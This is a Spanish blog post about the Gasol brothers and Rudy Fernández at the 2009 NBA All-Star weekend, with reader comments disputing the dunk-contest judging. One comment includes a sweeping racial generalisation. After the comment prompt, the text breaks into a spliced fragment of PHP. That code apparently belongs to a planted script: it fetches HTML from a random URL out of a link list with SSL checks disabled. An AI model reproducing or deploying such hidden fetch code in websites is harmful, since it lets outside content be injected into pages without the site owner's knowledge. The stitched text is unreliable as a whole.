El All Star de los españoles

16 de February de 2009 por Viva_Dirk

En este All Star de 2009 celebrado en Phoenix han tenido lugar varios hechos inéditos en la historia de la NBA y todos ellos relacionados con nuestros chicos. Era la primera vez que tres jugadores de la misma nacionalidad ‘no estadounidense’ coincidían en un All Star, la primera vez que coincidían dos hermanos y lo mas nombrado, la primera vez que un extranjero participaba en el concurso de mates. Con estos ingredientes esperábamos ver protagonismo de los nuestros todos los días de la fiesta por excelencia de la NBA.

Rookies VS Sophomores

El viernes comenzaba con Rudy Fernandez y Marc Gasol como titulares en el equipo de los novatos. Ambos tuvieron minutos y balones para demostrar que no desentonan en un espectaculo de este tipo. Marc se quedó a un paso del doble-doble con 15 puntos y 8 rebotes, mientras que Rudy en 22 minutos anotó 14 puntos, capturó 4 rebotes y dio 3 asistencias con un 4 de 8 en triples. Como curiosidad decir que Marc fue junto a Rose el que menos lanzó a canasta y aun así sus 15 puntos le dejan como tercer máximo anotador de los novatos. Salvo catástrofe los volveremos a ver en este evento el año que viene, quién sabe si con más protagonismo todavía. Si Beasley suelta alguna seguro que sí.

Concurso de mates

Si os soy sincero, no esperaba que Rudy pudiese competir con físicos como el de Howard o JR Smith y aunque tenía claro que podía hacer mejores mates que Robinson también sabía que el pequeñín tendría la misma bula del jurado de la que ha disfrutado en todas sus participaciones. Pero en mi opinión Rudy fue el mejor de la primera ronda a pesar de que le faltó hacer algun baile, disfrazarse o directamente hacer el payaso. En lo que a mates se refiere, que en teoría es de lo que va el concurso, el primero de Rudy fue muy bueno, con una dosis alta de dificultad por la precisión de tirarla al tablero por detrás de la espalda, cogiendo muy arriba el balón y siendo estéticamente precioso. Mínimo un 46. El segundo estuvo mermado por los intentos, algo que no impidió hace varios años ganar a Robinson, pero aun así es un mate brutal, tanto por originalidad como por dificultad. A pesar de los intentos debería haberse ido de nuevo por encima de 45. Si esto sigue así, tendrán que cambiar el nombre de concurso de mates a concurso de variedades. El resumen es que Rudy lo hizo genial y los del jurado querían ver una final Howard-Robinson. ¿Volverá a intentarlo el español?

All Star Game

Pau Gasol disputaba su segundo All Star con las ganas de sacarse la espina de su primera participación en la que no consiguió anotar ningún punto a pesar de capturar 12 rebotes. Era conocido por todos que esos 0 puntos eran motivo de bromas y risas a costa de Pau en la selección. Anoche ni se le ocurrió dedicarse a pasar el balón. En casi 17 minutos anotó 14 puntos, capturó 8 rebotes, dio una asistencia, robó un balón y colocó un tapón sin perdidas de balón, con un impecable 4 de 4 desde la personal y 5 de 7 en tiros de campo. Esta vez sí hizo un partido digno de su categoría y estuvo plenamente integrado en el combinado del Oeste. Cosas de jugar en los Lakers y con Kobe de padrino de ceremonia. Esperamos que Pau se convierta en un asiduo ya que por calidad como jugador no hay duda de que tiene hueco y ahora su equipo le permite estar más a la vista de todos.

Como sospechábamos el jueves, los nuestros tuvieron una buena dosis de protagonismo en este All Star 2009. Nos queda el mal sabor de boca del injusto trato recibido por Rudy en el concurso de mates pero a pesar de que los jueces no lo vieran, todo el pabellón y los que estábamos frente al televisor pudimos ver como un español dejaba su huella en el concurso más americano de todos.

Comenta

5 comentarios a esta entrada

  1. Rob dice:
    #1

    Empezamos bien,

    http://www.20minutos.es/noticia/450628/0/xenofobia/rudy/mates/

    Yo solo vi la noche de los concursos y me pareció, en general, pelín decepcionante.
    La primera prueba (veterano, en activo masculino y femenino) me pareció excepcional. Todavía no me explico como pueden meterla desde el medio campo tan rápido (con algunas excepciones).

    El manejo de balón y pases, en fin. Con decir que ganó el que menos ganas le puso. Por cierto, si queréis un ejemplo del tema de pasos, volver a ver las zonas de slalom y contar cuantos daban entre cono y cono.

    El concursos de triples patético, no tengo nada más que decir.

    Y el de mates, y aquí es donde quería llegar, me pareció lamentable, y si además leeis el enlace que he puesto al principio del comentario, pues para alucinar. A mi lo que más pena me da es que aunque le hubiera salido a la primera en segundo le hubieran dado 42 puntos igual. Eso sí, para el año que viene que prohiban el molinillo que ya aburre, molinillo tras votar el balón dos veces, molinillo tras tirar el balón desde atrás, etc, etc… Y lo de Howard, con una canasta más alta cuando competía con un tío al que le saca 40cm. de altura (con el brazo extendido igual llega a 50 cm. la diferencia o más), me parece darle puntos al rival (si el concurso fuera justo) y machacar desde el tiro libre pasando todo el pie de la línea y a dos manos… en fin (hasta hay blancos que lo hacen, se llamaba Barry, no ?)

      Citar

  2. txusma dice:
    #2

    Ey Rob! De aquí un rato se autopublicará un articulo de opinion sobre todo el AllStar en general y lo de los mates es uno de los temas candentes. No creo q llegue a xenofobia pero ya lo hablaremos en el otro articulo…

    Sobre los españoles yo no puedo quedar mas satisfecho: partido serio de Rudy y Marc, grandisima actuacion de Rudy en los mates (y me importa un carajo lo q votara el jurado) y buen partido de Gasol en el AllStar Game. Se puede pedir mas? Si. Q Calderon fuera al concurso de habilidades o al de triples… Entonces si que sería apoteósico.

      Citar

  3. kantonyo dice:
    #3

    Yo lo siento pero es que no he visto nada de xenofobia ni de injusticia ni nada de nada…..

    Respecto a lo de llamar Ricky Martin a Fernando Martin??? pues que quereis que os diga, pero si ni siquiera la gente aqui en españa conocen a Fernando, como para que lo conozcan en USA, solo jugo 146 minutos y metio 22 puntos … Anda que los comentaristas españoles no se rien de lo que ven en la tele cuando estan comentando…. Que asco de prensa tenemos, que hipocresia…… junto con los mecanicos es la profesion española que menos aguanto….

    Rudy lo intento casi una decena de veces, traspasando el tiempo de dos minutos, en ese tramo habia alguno como bill rusell que se tapaba la cara de verguenza, y luego hizo un pedazo mate… si lo hizo, pero joer despues de muchisimas oportunidades…… decir que la culpa fue de Pau Gasol, que no se la supo poner bien… hasta que Rudy le recordo donde la queria… una pena!

      Citar

  4. M dice:
    #4

    Tengo entendido que lo que se valora es el mate, y no los intentos previos (el ejemplo del anterior triunfo de Robinson es elocuente). Por otro lado, un mate más complicado es más difícil de realizar.

    Y se puede no saber quien es alguien sin tener que soltar chorradas para quedar como un ignorante, aunque supongo que es verdad que nuestra prensa hace cosas parecidas.

    ¿Dónde hay que apuntarse para que a uno le llamen para participar en los triples?, madre mía, que tropa… xDDD

      Citar

  5. TheDeerHunter dice:
    #5

    Las reglas eran claras… 2 minutos para intentar el mate las veces que fuera. Transcurrido el tiempo dos intentos extra más. Todo ello (entiendo) sin penalización porque era una casuística que recogían las bases.
    Ahora bien ¿porqué abucheaba la gente?? pues que aún penalizado ese mate debería haber tenido más nota que el de la espalda o el alley hoop de JR (ambos lamentables) y los 50 de Howard en la primera ronda fuero totalmente de cachondeo. Comparar esos mates con algún 50 que todos recordamos (o incluso con algún no-50) es pura burla al propio concurso.

    Ahora bien… ¿hubo xenofobia como incluso algunos medios estadounidenses reconocen??
    Para mí es evidente que no sienta bien la presencia de un jugador blanco, mucho peor si es extranjero, entre los jovenes (y no tan jovenes) afroamericanos que tienen puesto su cortijo en un concurso casi exclusivo para ellos. Sólo hay que ver el concurso aquel de Chris Andersen… o el de anoche de Rudy.
    ¿Que la broma de Ricky Martin era fruto de la casualidad y la ignorancia?? Bueno… ese es sólo un exponente (de muy mal gusto, por cierto) y puedo llegar a entender que no conocieran a Fernando. Pero… ¿qué sentido tenía mentar a Ricky Martin?? ¿en serio crees que el cenutrio que vertió ese comentario pensaba en serio que Rudy estaba homenajeando a Ricky Martin?? ¿No había ninguna tendenciosidad en el mismo??
    Lo que yo te diga… pero si no tienes ni puta idea de algo lo mejor es callarse el boquino.

    En cualquier caso… yo no tengo tan claro que hubiera robo o que de haberlo que hubiera sido por ese motivo. Es evidente (e incluso comprensible) que interesaba la final Robinson-Howard… y de habérselo merecido a mí también me encantaba esa final.

    Por lo demás, completamente de acuerdo con Viva. Gran actuación de los españoles en el All-Star y, lo más importante… dando ejemplo de muchas otras virtudes, más allá de las baloncestísticas. Falta hace.
    Por eso siempre digo que esta gente… Los Gasol, Garbajosa, Jimenez, Calderón, Raul, etc… van más allá de lo buenos que son jugando a baloncesto. Son mucho más grandes que todo eso.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>